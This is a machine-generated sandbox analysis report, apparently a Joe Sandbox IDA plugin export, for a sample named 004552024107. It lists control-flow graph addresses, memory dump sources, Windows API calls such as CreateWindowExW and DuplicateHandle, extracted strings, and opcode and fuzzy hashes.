154a4b 1540->1543 1541->1540 1545 154a2f 1541->1545 1542->1543 1546 154a43 1542->1546 1547 154a4c 1543->1547 1545->1540 1546->1543 1547->1547
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \V_k$\V_k
                                            • API String ID: 0-1818274013
                                            • Opcode ID: 7a80b3e66e443277bee2955a83571bd391b378cbf4e235474e692beedda7b1b7
                                            • Instruction ID: 316ff0cb6664610ec9818956023356db89c02a6c876add3612dc421cc30e4af0
                                            • Opcode Fuzzy Hash: 7a80b3e66e443277bee2955a83571bd391b378cbf4e235474e692beedda7b1b7
                                            • Instruction Fuzzy Hash: 37718C70E00249DFDB10CFA9C98579EFBF1BF48319F148129E825AB254DB74988ACB91

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1548 154800-15488c 1551 1548d6-1548d8 1548->1551 1552 15488e-154899 1548->1552 1554 1548da-1548f2 1551->1554 1552->1551 1553 15489b-1548a7 1552->1553 1555 1548a9-1548b3 1553->1555 1556 1548ca-1548d4 1553->1556 1561 1548f4-1548ff 1554->1561 1562 15493c-15493e 1554->1562 1557 1548b5 1555->1557 1558 1548b7-1548c6 1555->1558 1556->1554 1557->1558 1558->1558 1560 1548c8 1558->1560 1560->1556 1561->1562 1563 154901-15490d 1561->1563 1564 154940-154985 1562->1564 1565 154930-15493a 1563->1565 1566 15490f-154919 1563->1566 1572 15498b-154999 1564->1572 1565->1564 1568 15491d-15492c 1566->1568 1569 15491b 1566->1569 1568->1568 1570 15492e 1568->1570 1569->1568 1570->1565 1573 1549a2-1549ff 1572->1573 1574 15499b-1549a1 1572->1574 1581 154a01-154a05 1573->1581 1582 154a0f-154a13 1573->1582 1574->1573 1581->1582 1583 154a07-154a0a call 150ab8 1581->1583 1584 154a15-154a19 1582->1584 1585 154a23-154a27 1582->1585 1583->1582 1584->1585 1587 154a1b-154a1e call 150ab8 1584->1587 1588 154a37-154a3b 1585->1588 1589 154a29-154a2d 1585->1589 1587->1585 1590 154a3d-154a41 1588->1590 1591 154a4b 1588->1591 1589->1588 1593 154a2f 1589->1593 1590->1591 1594 154a43 1590->1594 1595 154a4c 1591->1595 1593->1588 1594->1591 1595->1595
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \V_k$\V_k
                                            • API String ID: 0-1818274013
                                            • Opcode ID: 03ead5828ce912519ced372db6df93850d635bc4966f309de0930528e3872f44
                                            • Instruction ID: 0b20aac5b7b8dc9777116bbf743e24ecf96aae303ce48c8a717e675e2a235043
                                            • Opcode Fuzzy Hash: 03ead5828ce912519ced372db6df93850d635bc4966f309de0930528e3872f44
                                            • Instruction Fuzzy Hash: 16719E70E00209DFDF14CFA9C98579EFBF2BF88319F148129D825AB254DB749886CB95

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1651 3737c0a0-3737c0da 1652 3737c100-3737c11e 1651->1652 1653 3737c0dc-3737c0fb 1651->1653 1657 3737c136-3737c14c 1652->1657 1658 3737c120-3737c128 1652->1658 1653->1652 1662 3737c157-3737c159 1657->1662 1658->1657 1663 3737c171-3737c1e2 1662->1663 1664 3737c15b-3737c163 1662->1664 1674 3737c1e4-3737c207 1663->1674 1675 3737c20e-3737c22a 1663->1675 1664->1663 1674->1675 1680 3737c256-3737c271 1675->1680 1681 3737c22c-3737c24f 1675->1681 1686 3737c273-3737c295 1680->1686 1687 3737c29c-3737c2b7 1680->1687 1681->1680 1686->1687 1692 3737c2e2-3737c9e1 1687->1692 1693 3737c2b9-3737c2db 1687->1693 1693->1692
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170677410.0000000037370000.00000040.00000800.00020000.00000000.sdmp, Offset: 37370000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37370000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $=q$$=q
                                            • API String ID: 0-1040963260
                                            • Opcode ID: 4317df495ef0a6ad84b83910421282524e7e29856b2b5817310928c0d572af28
                                            • Instruction ID: 2519cfa33bba852c3b8c0ba659ad4bc7b289b82fc3f4584c08fb6ba4b814fc4f
                                            • Opcode Fuzzy Hash: 4317df495ef0a6ad84b83910421282524e7e29856b2b5817310928c0d572af28
                                            • Instruction Fuzzy Hash: CB519134B002498FDB48DB68D954BAEB7F7AF89340F508569C809EB348EE31DD428B91

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1698 37377cf0-37377d24 1700 37377d26-37377d29 1698->1700 1701 37377d2b-37377d45 1700->1701 1702 37377d4a-37377d4d 1700->1702 1701->1702 1703 37377d53-37377e4b 1702->1703 1704 3737842c-3737842e 1702->1704 1722 37377e51-37377e9e call 373785d6 1703->1722 1723 37377ece-37377ed5 1703->1723 1705 37378435-37378438 1704->1705 1706 37378430 1704->1706 1705->1700 1708 3737843e-3737844b 1705->1708 1706->1705 1736 37377ea4-37377ec0 1722->1736 1724 37377edb-37377f4b 1723->1724 1725 37377f59-37377f62 1723->1725 1742 37377f56 1724->1742 1743 37377f4d 1724->1743 1725->1708 1739 37377ec2 1736->1739 1740 37377ecb 1736->1740 1739->1740 1740->1723 1742->1725 1743->1742
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170677410.0000000037370000.00000040.00000800.00020000.00000000.sdmp, Offset: 37370000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37370000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: fBq$XPBq
                                            • API String ID: 0-3533662481
                                            • Opcode ID: 8cacaa15f61aff0c3d17a7f89b4525d362c069243856904b70099ce96373d7c6
                                            • Instruction ID: 33636929428d5f48d14c542fa5266462f2712ae4f61c460820615ed1f642ad3a
                                            • Opcode Fuzzy Hash: 8cacaa15f61aff0c3d17a7f89b4525d362c069243856904b70099ce96373d7c6
                                            • Instruction Fuzzy Hash: 73518E74F002099FEB149FA5C854B9EBBF6EF89700F208129E109EB395DB758C459B91

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2521 365eb604-365eb676 2523 365eb678-365eb67e 2521->2523 2524 365eb681-365eb688 2521->2524 2523->2524 2525 365eb68a-365eb690 2524->2525 2526 365eb693-365eb6cb 2524->2526 2525->2526 2527 365eb6d3-365eb732 CreateWindowExW 2526->2527 2528 365eb73b-365eb773 2527->2528 2529 365eb734-365eb73a 2527->2529 2533 365eb775-365eb778 2528->2533 2534 365eb780 2528->2534 2529->2528 2533->2534 2535 365eb781 2534->2535 2535->2535
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 365EB722
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170122195.00000000365E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 365E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_365e0000_004552024107.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: e9382698820ea47a1bb3baaa283be214f3b038fdadddddd51a83b2c49f74358a
                                            • Instruction ID: f9a283a8559a8ded75ccb0c7927fde414a96ffa88ddfc3bc921f8bf6ae8451c6
                                            • Opcode Fuzzy Hash: e9382698820ea47a1bb3baaa283be214f3b038fdadddddd51a83b2c49f74358a
                                            • Instruction Fuzzy Hash: 9F51C0B1C00309AFDF14CFAAC984ADEBBB5FF48350F60852AE818AB210D7749941CF90
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 365EB722
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170122195.00000000365E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 365E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_365e0000_004552024107.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 17ff3d244d9f0d94e2232341c1eef30401f6ac9ec86fce8896b27d4acc28d375
                                            • Instruction ID: e45eacb9717e296a58c0100ff4a15b4c991ca5be148e072b8d5604509752aeff
                                            • Opcode Fuzzy Hash: 17ff3d244d9f0d94e2232341c1eef30401f6ac9ec86fce8896b27d4acc28d375
                                            • Instruction Fuzzy Hash: C741CFB1D003499FDF14CF9AC984ADEBBB5BF48310F60852AE819AB214D774A941CF90
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 365EDE21
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170122195.00000000365E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 365E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_365e0000_004552024107.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: bd0e9f6193b7cc31eb665343607abe3dde6965eab8e180164f5e4e5f1f9e1dda
                                            • Instruction ID: b6cbe8b5c392f188f6d323bb0ceb7042b789ac4e656ab6612e4d02ea092effb4
                                            • Opcode Fuzzy Hash: bd0e9f6193b7cc31eb665343607abe3dde6965eab8e180164f5e4e5f1f9e1dda
                                            • Instruction Fuzzy Hash: 754159B8900309CFDB14CF99C888AAAFBF5FF89314F258559D519AB361D731A941CFA0
                                            APIs
                                            • FindWindowW.USER32(00000000,00000000), ref: 365E6506
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170122195.00000000365E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 365E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_365e0000_004552024107.jbxd
                                            Similarity
                                            • API ID: FindWindow
                                            • String ID:
                                            • API String ID: 134000473-0
                                            • Opcode ID: db50f45c764e0224fdc3b0889c1bd14901caa851e4904f642d44522416815692
                                            • Instruction ID: a6c3080128e69b9aac2488e0c0efc588c55156e8c4db128f58633a675c013d39
                                            • Opcode Fuzzy Hash: db50f45c764e0224fdc3b0889c1bd14901caa851e4904f642d44522416815692
                                            • Instruction Fuzzy Hash: 3E2126B5C063488FCB11CFAAC880ADEFFB0FF4A254F5585AEC455AB242D375A505CBA1
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 365E131F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170122195.00000000365E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 365E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_365e0000_004552024107.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 296e365625ec72f41688a667baf4d24154678452b2373d29b9a08e3b92b39799
                                            • Instruction ID: abba73c6fb04559ed5dbe0da6db652dab093b9f0a72eb236134e7934e2f86016
                                            • Opcode Fuzzy Hash: 296e365625ec72f41688a667baf4d24154678452b2373d29b9a08e3b92b39799
                                            • Instruction Fuzzy Hash: D121E2B59002489FDB10CFAAD984AEEFFF4EB49320F10842AE954A3610D374A950CFA5
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 365E131F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170122195.00000000365E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 365E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_365e0000_004552024107.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 8cae3cf772f268d0404722a194da830223093a1b0ce0fd455d690db3eed7477f
                                            • Instruction ID: be5b90bf8790b5ce2d8a23614bf936020bb02effa1162d02fab87e9eea72f44d
                                            • Opcode Fuzzy Hash: 8cae3cf772f268d0404722a194da830223093a1b0ce0fd455d690db3eed7477f
                                            • Instruction Fuzzy Hash: FF21DFB59002489FDB10CFAAD984ADEFBF4EF48320F10842AE958A3210D374A950CFA5
                                            APIs
                                            • FindWindowW.USER32(00000000,00000000), ref: 365E6506
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170122195.00000000365E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 365E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_365e0000_004552024107.jbxd
                                            Similarity
                                            • API ID: FindWindow
                                            • String ID:
                                            • API String ID: 134000473-0
                                            • Opcode ID: 3d1a62945a8c8ac28678bd071f90a945016d66027e25001b7761ec2402086124
                                            • Instruction ID: 959034840098e02569424ff7fac5968f2fbc0afa1d14874d369947200e8ff0dd
                                            • Opcode Fuzzy Hash: 3d1a62945a8c8ac28678bd071f90a945016d66027e25001b7761ec2402086124
                                            • Instruction Fuzzy Hash: D7210DB5D013098ECB10CF9AD884ADEFBB4FB49720F50852ED459B7201C375A604CFA5
                                            APIs
                                            • FindWindowW.USER32(00000000,00000000), ref: 365E6506
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170122195.00000000365E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 365E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_365e0000_004552024107.jbxd
                                            Similarity
                                            • API ID: FindWindow
                                            • String ID:
                                            • API String ID: 134000473-0
                                            • Opcode ID: d72e873b21cf25fbac31715145248338260b2a25bd8d37978d77f913a6a1b052
                                            • Instruction ID: 009af695695071c96a7af82e234e23a92e66d143a8cfa111f4fdfeff90902b13
                                            • Opcode Fuzzy Hash: d72e873b21cf25fbac31715145248338260b2a25bd8d37978d77f913a6a1b052
                                            • Instruction Fuzzy Hash: 70210DB5D013098ECB10CF9AD884ADEFBB4FB49720F50852ED459B7201C375A604CFA5
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170780124.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_373a0000_004552024107.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: 9f8dd56aa5cfead3107ea6f746fafe9a1b98fe32243239a5e801f18cf8fad4b2
                                            • Instruction ID: 1f620a5e45c77704360fe470571e16ff3bd5dbcfe220dd2e4593afac60cb8ebe
                                            • Opcode Fuzzy Hash: 9f8dd56aa5cfead3107ea6f746fafe9a1b98fe32243239a5e801f18cf8fad4b2
                                            • Instruction Fuzzy Hash: 5F1103B59003499FCB10CFAAD944BDEFBF4EF48720F208819D559A7601D374A540CFA5
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170780124.00000000373A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_373a0000_004552024107.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: 5996a7343f4315d51e1f7b55c1c4fef7d80d5220888a4a5f97706e77e20b7f7c
                                            • Instruction ID: 5c6888209b76a84dbad83a1141551bfd2705c6871c82aad18c9f96ce328e5de8
                                            • Opcode Fuzzy Hash: 5996a7343f4315d51e1f7b55c1c4fef7d80d5220888a4a5f97706e77e20b7f7c
                                            • Instruction Fuzzy Hash: 2911E2B59003488FCB10CFAAD984BDEFBF4EF48724F218859D559A7600D375A944CFA5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \V_k
                                            • API String ID: 0-804111439
                                            • Opcode ID: 2e512c01fce246883d25126dd609ba06ad3014c4525fc63d015361b429b02b41
                                            • Instruction ID: 1f615a7be740242ea6299da986be9b85a3b5fb90fd8cd6bb11c42f58b1fb57dc
                                            • Opcode Fuzzy Hash: 2e512c01fce246883d25126dd609ba06ad3014c4525fc63d015361b429b02b41
                                            • Instruction Fuzzy Hash: 70917070E00209CFDF14CFA8D9857DDBBF2BF48355F248129E825AB294DB749989CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170677410.0000000037370000.00000040.00000800.00020000.00000000.sdmp, Offset: 37370000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37370000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH=q
                                            • API String ID: 0-3643409874
                                            • Opcode ID: e6ce358ed5e0fa91cc0de86ad73356ff554fd2e2b33f4f4e476c64dd7fd810eb
                                            • Instruction ID: 0d7112452c3abf041b3afa76802ac9a924dfcbef437caba2d5a372603996e595
                                            • Opcode Fuzzy Hash: e6ce358ed5e0fa91cc0de86ad73356ff554fd2e2b33f4f4e476c64dd7fd810eb
                                            • Instruction Fuzzy Hash: 9631CF34B102459FEB0DAB34C6546AF7BE3AFC8250F508528D40ADB385EE35ED02CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170677410.0000000037370000.00000040.00000800.00020000.00000000.sdmp, Offset: 37370000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37370000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH=q
                                            • API String ID: 0-3643409874
                                            • Opcode ID: 4d5812231c362e88e0cecd0a85eeae8dd0c029349a57bd6d2737aba6b6ae32d2
                                            • Instruction ID: 01ad0ffa3b30851b19edc86df3cd8400cefd68879506bf1db1c90ccd77b5e40e
                                            • Opcode Fuzzy Hash: 4d5812231c362e88e0cecd0a85eeae8dd0c029349a57bd6d2737aba6b6ae32d2
                                            • Instruction Fuzzy Hash: A931E134B103819FEB0E9F34C5942AE7BA3AF89210B64856CD40ADB345EF39DD06CB81
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR=q
                                            • API String ID: 0-3528772435
                                            • Opcode ID: 080bf030227529b62c4579bcf82027db8d7cc6317edbd771c92fa8f5015c208a
                                            • Instruction ID: a4652756aa3f0f60b95815744d7502ba2b83fa78db319fb4ad6ed8d6b512b3f1
                                            • Opcode Fuzzy Hash: 080bf030227529b62c4579bcf82027db8d7cc6317edbd771c92fa8f5015c208a
                                            • Instruction Fuzzy Hash: 9B31AE30E50209DFDB14CBA5C84179EBBB2EF95301F518629E812FF280E7B49C4ACB51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR=q
                                            • API String ID: 0-3528772435
                                            • Opcode ID: 17ce84506d83bec5e98e356fe281ffc527c023eb52ece7e9a33a1e1573c5ee49
                                            • Instruction ID: d9706c2f13c666fbe58a026083da9a46a77815c33f9d7097adbac9cde078c854
                                            • Opcode Fuzzy Hash: 17ce84506d83bec5e98e356fe281ffc527c023eb52ece7e9a33a1e1573c5ee49
                                            • Instruction Fuzzy Hash: 90316E30E50209CBDB14CFA5C95579EB7B2EF85311F51862AE812FF240E7B4AC4ACB51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: +hr^
                                            • API String ID: 0-2138358300
                                            • Opcode ID: f4b4da680b56a68843981429efad19fe32b796d4f29c9fffe48f6a28860557bd
                                            • Instruction ID: af9065570c7812705ec6a63a8242f261874cd79c62adc11b316514125f5cb775
                                            • Opcode Fuzzy Hash: f4b4da680b56a68843981429efad19fe32b796d4f29c9fffe48f6a28860557bd
                                            • Instruction Fuzzy Hash: 0A210430A04244CBEF2B97E489646393761AB5D327F544969C9B9CF246DB20CD4EC782
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR=q
                                            • API String ID: 0-3528772435
                                            • Opcode ID: e745d6281ac7332d3a144d213fb36d568eac7628bbda0154db566e9167165662
                                            • Instruction ID: 062f8fe05711e5f792b8bb365214e36f828e1862aef2553b07ae406d261e8532
                                            • Opcode Fuzzy Hash: e745d6281ac7332d3a144d213fb36d568eac7628bbda0154db566e9167165662
                                            • Instruction Fuzzy Hash: B22127303082409FCB0AEB78946529E7BB6EF86300B1145AFD045CB786DE359D49C7D1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 'C4
                                            • API String ID: 0-3971856736
                                            • Opcode ID: e279ddfde53503e9520c1d43df55191542838534f001aa51c31e504c3f317da2
                                            • Instruction ID: 2effba50ac7781a655c758b7121f1bae241269e46bda901bc4a9026f31fa1d20
                                            • Opcode Fuzzy Hash: e279ddfde53503e9520c1d43df55191542838534f001aa51c31e504c3f317da2
                                            • Instruction Fuzzy Hash: BA212B34220340DFCB2FD728D588B193B22EB49706F104C61D419DF154EF748E8ACB80
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: +hr^
                                            • API String ID: 0-2138358300
                                            • Opcode ID: e3a080c4e53b52e95ee23be5c2755e188540796603183b0404e4fe3f9f8f5b84
                                            • Instruction ID: 20dda2cd968aeb67afc43aa2259a75c8f250b3d6a818f5ff618bc5965019b49c
                                            • Opcode Fuzzy Hash: e3a080c4e53b52e95ee23be5c2755e188540796603183b0404e4fe3f9f8f5b84
                                            • Instruction Fuzzy Hash: CC11C130A00300CFDF2B5BF4D91176937A4EB4A716F15487AD866CF282EB25DD4A8BC2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: +hr^
                                            • API String ID: 0-2138358300
                                            • Opcode ID: 07b656985e287754e41992c1b26b8c039637d25b19cfc1cc01d9bb85f311c2b2
                                            • Instruction ID: 6b39cc890f4b920574094952652f046a0f4607948f4838bf1c046c5865e18506
                                            • Opcode Fuzzy Hash: 07b656985e287754e41992c1b26b8c039637d25b19cfc1cc01d9bb85f311c2b2
                                            • Instruction Fuzzy Hash: 0911E330F00204CBDF6A9BB9C904B2D3295EB8D316F208939E826CF341EB21DD498BC1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR=q
                                            • API String ID: 0-3528772435
                                            • Opcode ID: 47dfeb9e67b751967243378d6fccdc664622f0573f6c6a2c1b7903b8a27e9016
                                            • Instruction ID: b99ce9243030905b730238be6353d90a9141b6e1422d644c2e06cd714cbfc595
                                            • Opcode Fuzzy Hash: 47dfeb9e67b751967243378d6fccdc664622f0573f6c6a2c1b7903b8a27e9016
                                            • Instruction Fuzzy Hash: A801D4317042408FCB15A7B8841469EBBF6EFCA311B10816FD056CF391DF754D498B91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170677410.0000000037370000.00000040.00000800.00020000.00000000.sdmp, Offset: 37370000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37370000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $=q
                                            • API String ID: 0-1509025374
                                            • Opcode ID: 4389ce4eca018c975f194abc4ed810871cfb31cfa1327512ce8300943234c8ad
                                            • Instruction ID: 0acbf047ada3ed75ac34bd0b3dc28ef0bbadcbee3cf27bf0f4149ae62416ee78
                                            • Opcode Fuzzy Hash: 4389ce4eca018c975f194abc4ed810871cfb31cfa1327512ce8300943234c8ad
                                            • Instruction Fuzzy Hash: 50F0E5BA754385CBEB188E8CE9C026A73A8EF803A5F004062D908E7540CB3BDE45C751
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170677410.0000000037370000.00000040.00000800.00020000.00000000.sdmp, Offset: 37370000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37370000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \OBq
                                            • API String ID: 0-1041549782
                                            • Opcode ID: 42961ee1450591f95ebcb41bac0441240f3009dcf955eb151608a336d7ac60db
                                            • Instruction ID: 74d23f0014c4fb86ede33f9caa934acc29fe293d75d9d68e57824b5751a878ca
                                            • Opcode Fuzzy Hash: 42961ee1450591f95ebcb41bac0441240f3009dcf955eb151608a336d7ac60db
                                            • Instruction Fuzzy Hash: 50F01C70A2021ADFDB14DF90E869BAEBBB2FF88710F204519E446A7294CBB41C45CF81
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: af5624794cdef9a92a143c1e4183dd61a6368dfe2cc6ccf4dce8f01c56e135ac
                                            • Instruction ID: 220a90c65cf1f96450d3f6f06f9cb8be1cd451581540af79c4e4fd1e940d513b
                                            • Opcode Fuzzy Hash: af5624794cdef9a92a143c1e4183dd61a6368dfe2cc6ccf4dce8f01c56e135ac
                                            • Instruction Fuzzy Hash: AB126D70714205CBCB1AAB78D29566C32E2EBC9306B508A39E046EF351DF75ED47AF80
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170677410.0000000037370000.00000040.00000800.00020000.00000000.sdmp, Offset: 37370000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37370000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3431f50e57019fa0f9ddf38b3f69aac5f1a49f43ab078d41c419c84a749b55fd
                                            • Instruction ID: 6ef7831dd51278375768a04f932187918f171d3e89e63a8903251d0a90d021a1
                                            • Opcode Fuzzy Hash: 3431f50e57019fa0f9ddf38b3f69aac5f1a49f43ab078d41c419c84a749b55fd
                                            • Instruction Fuzzy Hash: F7023674A40244CFDB14DF54C5A4B99B7B2FF88324F99C4AAD409AB255DB3AEC46CF80
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6140901604.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_150000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6f0b561dad601792913644ba5ced181b4b8993aaba36afcefc47caa7edee1eca
                                            • Instruction ID: d559e2e8b3da6f7e799747c6da4bcb53b234d1ebf31aeaf8458977832b975696
                                            • Opcode Fuzzy Hash: 6f0b561dad601792913644ba5ced181b4b8993aaba36afcefc47caa7edee1eca
                                            • Instruction Fuzzy Hash: 71A15070E00209CFDF14CFA9D99579DBBF2BF88319F148129D825EB254EB749889CB81
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.6170677410.0000000037370000.00000040.00000800.00020000.00000000.sdmp, Offset: 37370000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_37370000_004552024107.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
